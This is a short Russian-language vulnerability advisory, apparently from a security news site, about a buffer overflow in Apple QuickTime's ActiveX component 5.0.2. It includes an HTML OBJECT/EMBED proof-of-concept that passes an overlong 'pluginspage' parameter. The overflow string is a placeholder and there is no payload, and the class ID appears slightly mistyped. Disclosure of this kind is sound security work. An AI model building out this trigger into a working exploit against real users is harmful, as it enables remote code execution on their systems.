Уязвимость обнаружена в ActiveX компоненте Apple Quicktime для Internet Explorer. Если ActiveX компонент вызван с чрезмерно длинным параметром "pluginspage", произойдет переполнение буфера. Уязвимость позволяет
атакующему выполнить произвольный код на уязвимой системе. Уязвимость может использоваться через Web браузер или HTML почтовое сообщение. Пример: 

<OBJECT CLASSID="clsid:02BF25D5-8C1-4B23-BC80-D3488ABDDC6B"
WIDTH="480" HEIGHT="36">
<PARAM NAME="src" VALUE="test.mov">
<PARAM NAME="controller" VALUE="false">
<PARAM NAME="target" VALUE="myself">
<PARAM NAME="href" VALUE="test.mov">
<PARAM NAME="pluginspage" VALUE="очень длинная стока">
<EMBED WIDTH="480" HEIGHT="36" CONTROLLER="false"
TARGET="myself" href="https://xakep.ru/wp-content/uploads/post/16273/test2.mov"
SRC="test.mov"
BGCOLOR="FFFFFF"
BORDER="0"
PLUGINSPAGE=" очень длинная стока">
</EMBED>
</OBJECT>

Уязвимость обнаружена в Apple Quicktime ActiveX Component 5.0.2.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии